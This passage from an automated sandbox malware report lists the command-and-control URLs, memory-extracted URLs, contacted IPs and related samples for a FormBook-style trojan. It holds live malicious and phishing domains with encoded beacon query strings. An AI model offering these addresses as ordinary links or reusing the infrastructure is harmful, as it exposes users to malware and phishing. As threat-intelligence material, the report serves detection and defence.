http://www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=	false	Avira URL Cloud: safe	unknown
http://www.kasegitai.tokyo/fo8o/	false	Avira URL Cloud: malware	unknown
http://www.shenzhoucui.com/fo8o/	false	Avira URL Cloud: malware	unknown
http://www.antonio-vivaldi.mobi/fo8o/?aZ=PTl5gU/3CD/Xhg5KDlHojN2VTQtAUK5FTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZdnZ60ZUmbyLe/qr8s1uSeQEj8wGRnlWDvMs=&qD=FrMTb	false	Avira URL Cloud: safe	unknown
http://www.goldenjade-travel.com/fo8o/	false	Avira URL Cloud: safe	unknown
http://www.antonio-vivaldi.mobi/fo8o/	false	Avira URL Cloud: safe	unknown
http://www.goldenjade-travel.com/fo8o/?qD=FrMTb&aZ=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=	false	Avira URL Cloud: safe	unknown
http://www.elettrosistemista.zip/fo8o/	false	Avira URL Cloud: malware	unknown
http://www.donnavariedades.com/fo8o/	false	Avira URL Cloud: safe	unknown
http://www.b301.space/fo8o/?aZ=AU3XYvZFaGSlytwpVw8yOp8P3DTmtaA+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBKF09gVMhv/0PQsBNVEJ3Y6D3Cho3zWe+YcQ=&qD=FrMTb	false	Avira URL Cloud: safe	unknown
http://www.660danm.top/fo8o/?qD=FrMTb&aZ=tDTx8bBUOSgexthKGxTOnUCc0VRR9qJVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrOeLTXcC8Q+8Ca4ZDKyYIpPg4REm9D5WLqa0=	false	Avira URL Cloud: malware	unknown
http://www.b301.space/fo8o/	false	Avira URL Cloud: safe	unknown
http://www.elettrosistemista.zip/fo8o/?qD=FrMTb&aZ=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=	false	Avira URL Cloud: malware	unknown
http://www.rssnewscast.com/fo8o/?aZ=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&qD=FrMTb	false	Avira URL Cloud: safe	unknown
http://www.donnavariedades.com/fo8o/?aZ=l+301ZvITCxaX9AA4lYSKJRm7SqH4t3JgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFAmOdnck9fouhB1RUuBib5vZojQkCZCqKk0=&qD=FrMTb	false	Avira URL Cloud: safe	unknown
http://www.techchains.info/fo8o/	false	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	netbtugc.exe, 00000004.00000002.4250941955.000000000808B000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	netbtugc.exe, 00000004.00000002.4249071276.0000000005178000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004508000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	netbtugc.exe, 00000004.00000002.4250941955.000000000808B000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://reg.ru	netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	netbtugc.exe, 00000004.00000002.4249071276.0000000005178000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004508000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://donnavariedades.com/fo8o?aZ=l	netbtugc.exe, 00000004.00000002.4249071276.0000000004FE6000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004376000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/whois/?check=&dname=www.b301.space&reg_source=parking_auto	netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://track.uc.cn/collect	netbtugc.exe, 00000004.00000002.4249071276.0000000005178000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4250839150.0000000006640000.00000004.00000800.00020000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004508000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.empowermedeco.com/fo8o/?aZ=mxnR	netbtugc.exe, 00000004.00000002.4249071276.000000000530A000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.000000000469A000.00000004.00000001.00040000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	netbtugc.exe, 00000004.00000002.4250941955.000000000808B000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://push.zhanzhang.baidu.com/push.js	netbtugc.exe, 00000004.00000002.4249071276.00000000057C0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4250839150.0000000006640000.00000004.00000800.00020000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004B50000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	netbtugc.exe, 00000004.00000002.4250839150.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4249071276.000000000499E000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000003D2E000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://hm.baidu.com/hm.js?	netbtugc.exe, 00000004.00000002.4249071276.0000000005178000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004508000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	netbtugc.exe, 00000004.00000002.4250941955.000000000808B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/hosting/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_host&am	netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js	netbtugc.exe, 00000004.00000002.4249071276.0000000005178000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004508000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css	netbtugc.exe, 00000004.00000002.4249071276.0000000005178000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4250839150.0000000006640000.00000004.00000800.00020000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004508000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.goldenjade-travel.com/fo8o/?qD=FrMTb&aZ=LFKqyrcu7g1NCa8bLlrIs	netbtugc.exe, 00000004.00000002.4249071276.00000000044E8000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000003878000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://parking.reg.ru/script/get_domain_data?domain_name=www.b301.space&rand=	netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	netbtugc.exe, 00000004.00000002.4249071276.0000000005178000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4250839150.0000000006640000.00000004.00000800.00020000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004508000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/domain/new/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_new&	netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	netbtugc.exe, 00000004.00000002.4250941955.000000000808B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://zz.bdstatic.com/linksubmit/push.js	netbtugc.exe, 00000004.00000002.4249071276.00000000057C0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4250839150.0000000006640000.00000004.00000800.00020000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004B50000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/dedicated/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_serve	netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/web-sites/website-builder/?utm_source=www.b301.space&utm_medium=parking&utm_campa	netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	netbtugc.exe, 00000004.00000002.4250941955.000000000808B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://musee.mobi/vivaldi/fo8o/?aZ=PTl5gU/3CD/Xhg5KDlHojN2VTQtAUK5FTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFx	fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000003A0A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js	netbtugc.exe, 00000004.00000002.4249071276.0000000005178000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4250839150.0000000006640000.00000004.00000800.00020000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004508000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.sedo.com/services/parking.php3	fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000003D2E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	netbtugc.exe, 00000004.00000002.4250941955.000000000808B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://codepen.io/uzcho_/pens/popular/?grid_type=list	netbtugc.exe, 00000004.00000002.4249071276.0000000004CC2000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004052000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.goldenjade-travel.com/fo8o/?qD=FrMTb&aZ=LFKqyrcu7g1NCa8bLlrIs	netbtugc.exe, 00000004.00000002.4249071276.00000000044E8000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000003878000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://codepen.io/uzcho_/pen/eYdmdXw.css	netbtugc.exe, 00000004.00000002.4249071276.0000000004CC2000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004052000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/web-sites/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_cms&a	netbtugc.exe, 00000004.00000002.4249071276.0000000005952000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000002.4248567183.0000000004CE2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.b301.space	fIuefTlcmxsHvlw.exe, 00000008.00000002.4250197386.0000000005644000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	netbtugc.exe, 00000004.00000002.4250941955.000000000808B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.94	www.rssnewscast.com	Germany	47846	SEDO-ASDE	false
34.111.148.214	www.660danm.top	United States	15169	GOOGLEUS	false
116.50.37.244	www.goldenjade-travel.com	Taiwan; Republic of China (ROC)	18046	DONGFONG-TWDongFongTechnologyCoLtdTW	false
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
202.172.28.202	www.kasegitai.tokyo	Japan	37907	DIGIROCKDigiRockIncJP	false
66.29.149.46	www.techchains.info	United States	19538	ADVANTAGECOMUS	false
104.206.198.212	www.shenzhoucui.com	United States	62904	EONIX-COMMUNICATIONS-ASBLOCK-62904US	false
154.215.72.110	www.3xfootball.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
195.110.124.133	elettrosistemista.zip	Italy	39729	REGISTER-ASIT	false
194.58.112.174	www.b301.space	Russian Federation	197695	AS-REGRU	false
46.30.213.191	www.antonio-vivaldi.mobi	Denmark	51468	ONECOMDK	false
217.196.55.202	empowermedeco.com	Norway	29300	AS-DIRECTCONNECTNO	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1454063
Start date and time:	2024-06-08 18:13:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	N2sgk6jMa2.exe renamed because original name is a hash value
Original Sample Name:	b94b6c27e410388cd4e7dfeb352b75ce.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/9@18/13
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 63 Number of non-executed functions: 271
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
12:15:04	API Interceptor	12328177x Sleep call for process: netbtugc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.195.240.94	13820099132-PHOTO.lnk	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	13820099133-PHOTO.lnk	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	Utility R.lnk	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	Offer Document 23.lnk	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	qtCWL0lgfX.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	Offer Document 24.lnk	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	Ordin de plat#U0103.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.petrojetclub.com/q0kk/
	YPR010098- Quote- PFI.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.winhgx.com/u88q/
	PO_INdllc0987633.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.winhgx.com/u88q/
	o8JSCMaz7d.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
116.50.37.244	13820099132-PHOTO.lnk	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
	13820099133-PHOTO.lnk	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
	Utility R.lnk	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
	Offer Document 23.lnk	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
	qtCWL0lgfX.exe	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
	Offer Document 24.lnk	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
	o8JSCMaz7d.exe	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
	Document 151-512024.exe	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwnciuyQsy8w1cq+9C58fB3trEND4VQ==
	150-425-2024.exe	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
natroredirect.natrocdn.com	13820099132-PHOTO.lnk	Get hash	malicious	FormBook	Browse	85.159.66.93
	13820099133-PHOTO.lnk	Get hash	malicious	FormBook	Browse	85.159.66.93
	ulACwpUCSU.exe	Get hash	malicious	FormBook, GuLoader	Browse	85.159.66.93
	Utility R.lnk	Get hash	malicious	FormBook	Browse	85.159.66.93
	Offer Document 23.lnk	Get hash	malicious	FormBook	Browse	85.159.66.93
	qtCWL0lgfX.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Offer Document 24.lnk	Get hash	malicious	FormBook	Browse	85.159.66.93
	o8JSCMaz7d.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Document 151-512024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	150-425-2024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
www.kasegitai.tokyo	13820099132-PHOTO.lnk	Get hash	malicious	FormBook	Browse	202.172.28.202
	13820099133-PHOTO.lnk	Get hash	malicious	FormBook	Browse	202.172.28.202
	Utility R.lnk	Get hash	malicious	FormBook	Browse	202.172.28.202
	Offer Document 23.lnk	Get hash	malicious	FormBook	Browse	202.172.28.202
	qtCWL0lgfX.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
	Offer Document 24.lnk	Get hash	malicious	FormBook	Browse	202.172.28.202
	o8JSCMaz7d.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
	Document 151-512024.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
	150-425-2024.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
shops.myshopify.com	13820099132-PHOTO.lnk	Get hash	malicious	FormBook	Browse	23.227.38.74
	13820099133-PHOTO.lnk	Get hash	malicious	FormBook	Browse	23.227.38.74
	https://559130-81.myshopify.com/_t/c/A1020005-17D67710C1FD3FFE-54C78B72?l=AACRiPXRxK9LeRpD4cDvoS9bXCG%2BDAoDLNX5fp0sgIPztMUhUGzEyWVsmaTksaZVS8V3tfLQ58vzz2CePbxcXEYwKSCD5peaw2J77oTKvLDc6KjHRaVw1W0pAmx5U%2Bczno0GShAHXkFB4SJaL6iDI743h5X2ryzKYUuyFe%2B9bCuz5inYqkE%3D&c=AACU2WYm1YoxWX5Q222lkeLwuWaMJFo59Hn1KMR2ZoViL1nGLNWCfjXDhau8hrsOB%2B2%2FHRQolBOCcsaU6ND3PolllDNHZ0If4DZGqCRFSJKRwvrmEl42UkTTn4seuYIceVRWOWSJE2ktSPZuF0p5tjBKVRIUmrKXwy%2FD9PT9htiTisub374iNBS8YPBp6THkFoI3ehY%2FFYDn6YJe6PGDLYcm3L6uSxtWRMuxI51PFZk%2BQvmn%2B5jZpZ%2Bs4DdJ6bzOFuOZ12RBUusMnpMo8fbe7fnB1yJt55fknY9xECgMUbR0VkzVxXkJK2%2FyuEo8frl%2FN0x5XBMHMlz6ZEFI9o4pUbROv6EKUuydsOjkD96hSzMCifNDDSC9A5ZZcjGYBaYaiwjxOqGhn5JcYalZxPA3GJHXvng4PBdCLlgG%2FRyJIgpRxYNnhzb%2BwAINxPJ6xdJopT2wJp5S0WSxrkKh9xIsAlYimr6BYs6KyQ9elJDUWm43PkznrhvHJMBOZ4KbdNhrhpgE1ZDCGM5q%2BR6FX3ttOb8qezmca%2FnHBqeGl87Bms79cWAL%2FpNGlyHHnVQd63lmjaWb9ipYZiIl5bQjsjRv6i7AkjMhQO4LE%2BldC66RLNigq9Ug%2B%2BN%2FXJAFah%2FfWRM%2FvaOjrg6lurHyQJQ8poHSNGbqtQY72wpHRmHBZBhYFXVsTojrOuzj	Get hash	malicious	HTMLPhisher	Browse	23.227.38.74
	WtboJk1g7r.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	https://b2b242-7a.myshopify.com/_t/c/A1020005-17D59833F6C3712C-54859E44?l=AACCopCgchdqYUPbIMIp37uJ%2BNijt8onalSxRvtI9uby7zZZJMKmBJga1P%2F16fU6x3ufO%2BwHLP8WzDTexGY98Ckj7L6%2F3mOpjrv2R6qK5y9s25LZ1Z0JUxW7VFwA6PCawjqT45PoR8f4XFKwjOMVOQydreMf&c=AACURHWxnJomGrcb76Z%2FBlpTadTeCko5KeQXzrv0j%2Ft4mrZJeR9hoKgz69%2BMUooN4eiGMoXusaVYlo1DcnWj6wspiXvFisjgbyD6w3otij9YwVJCO%2Bh8zhQkVKEjR%2FYkvuA1%2B6abz6wQM%2BwfLPZno9C4QQ1BHsXuSXrX1DyRpSUw%2F%2FHDcvSkrjqpWu9GEYUlyaITNt4LX8VcVvVSWwiNpy3BB7zqzQNx8sMVvtfs5Bm85y7%2BeaqtYjC0l0Fs%2B7E%2FclJoXSAM%2FbIQ7PjLCpl2Z%2Bl5%2FxY3mE1O6kZG0ddiMH8TyrylxRUqeoKmLidN%2FxJrAPlLHYSKgHqxB2xzPYFgJWxgw%2FlQ76N9aPhFK4ZfD62nBIzxoieYR8s2oJYnaoFp54c%2FYiKMbxvW4%2FJpNgVaDfiGnQEty6LLKwYVopw2a0zKUYecAVuINqnUWxTeJqEGPySUGC6bbOLrQ319vjm0d5PTnvOJIzlhhneovhm5GMu5F%2BspbqKjz%2B%2Bh3J2gcq2N0kgi7MubwbpN7lflTwIZ%2FhMY23h1m8VtO5ARto52VDEu%2FcniHhnxGZGpsEJtzXIi3q7laCjLV2qRwU8I5e9vxrfu6q2PyQYtsIUcyh4tWTzf6s%2FZIGnru91PMIN06c0NPITfbMU0dkcjSIosdHfLkIgD2oDfmfxJ1Y4d4PzMWwFdzsPlFLaZ	Get hash	malicious	Unknown	Browse	23.227.38.74
	https://bizfilehub.com/statement-of-information.php?utm_campaign=Segmenteq&utm_source=1323553&utm_medium=1880848	Get hash	malicious	Unknown	Browse	23.227.38.74
	pp0fHVNbib.exe	Get hash	malicious	FormBook, GuLoader	Browse	23.227.38.74
	ulACwpUCSU.exe	Get hash	malicious	FormBook, GuLoader	Browse	23.227.38.74
	Utility R.lnk	Get hash	malicious	FormBook	Browse	23.227.38.74
	https://b2a6b3-40.myshopify.com/_t/c/A1020005-17D582A5E5C700C4-41C65D11?l=AABOE1En7mY7fIxXWOoxNlkFZ27UjJAkXtBBIOMORgXvtq7SjCGqSnB1BoxETCzebYwSdk/Zcmv4gZjf5u0DJtyRcL/nJjeqWX7Nbum04fMX+WVakp5LNEtbxTZxUyFqZ5535oA0aCUcyNZpXBipudkp&c=AABoCwiRIWoJ4OVr9aOuYq0W+fPXvBycUWU7egZym/103DUqiL/gs/X5GabCGF2T6tGL+rSgl4C7tJbJ2KS61EeO1hhCreQA8X97uaUvje2mBVkkQvPbwjdpIM30AJIPMDxnuu8MV0M5VT8s5kPvSUlsH4ih0NApULPsFyTEkxP/AiVWyfHlxutMGfslAX0HDI8sgkrwLRCm2sFlp9f/fqjsT0OFw2ecQx4ZF+EUYWnFL9CaaXWIr7LoRJWjkzr8C52tASMOlKwAjTVZKsP/Oevb+sUIHnbaWI8oQGEre+YLMou7GmMJL1vNrJUNEQyj9Slb5ZM5EdIutaaisUMHJAIxSGPJZOkLDdl/TK5WLtgX6NrJK90mpEkmZ4Vf9HD6MgYK+9N4vRndjM5XfK8gDsBwwkjb8f619pX0lGXu5ZceUFDjgm8/Pm1K19cfGlroUrSXYLXAd+N8tIyLPwBgXJ7NapwhY0VnksTFfdVMFxg6D2l0RyWmHqCXMiBN7L48KDpXqjKHZ/v/MZe0cO2BTy6tr51wRKfXi2RCZTZ+gJHT6rdg4sXti32m4fSX5TB7NfZoDpEPcfwt187i5GSNi2NVDcZ5HFSvjrHlcTm6mXA616Xq5kXBDLMgBn52joRna/N74JUtmdgiR26DrEssiMqd8PWUY9+QBtJh8TUHV0On0ri9VufC	Get hash	malicious	Unknown	Browse	23.227.38.74

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DONGFONG-TWDongFongTechnologyCoLtdTW	13820099132-PHOTO.lnk	Get hash	malicious	FormBook	Browse	116.50.37.244
	13820099133-PHOTO.lnk	Get hash	malicious	FormBook	Browse	116.50.37.244
	Utility R.lnk	Get hash	malicious	FormBook	Browse	116.50.37.244
	Offer Document 23.lnk	Get hash	malicious	FormBook	Browse	116.50.37.244
	qtCWL0lgfX.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	Offer Document 24.lnk	Get hash	malicious	FormBook	Browse	116.50.37.244
	eyKGju2MU8.elf	Get hash	malicious	Mirai	Browse	119.15.228.117
	JvULMWY21C.elf	Get hash	malicious	Unknown	Browse	119.15.228.101
	o8JSCMaz7d.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	Document 151-512024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
CIZGITR	13820099132-PHOTO.lnk	Get hash	malicious	FormBook	Browse	85.159.66.93
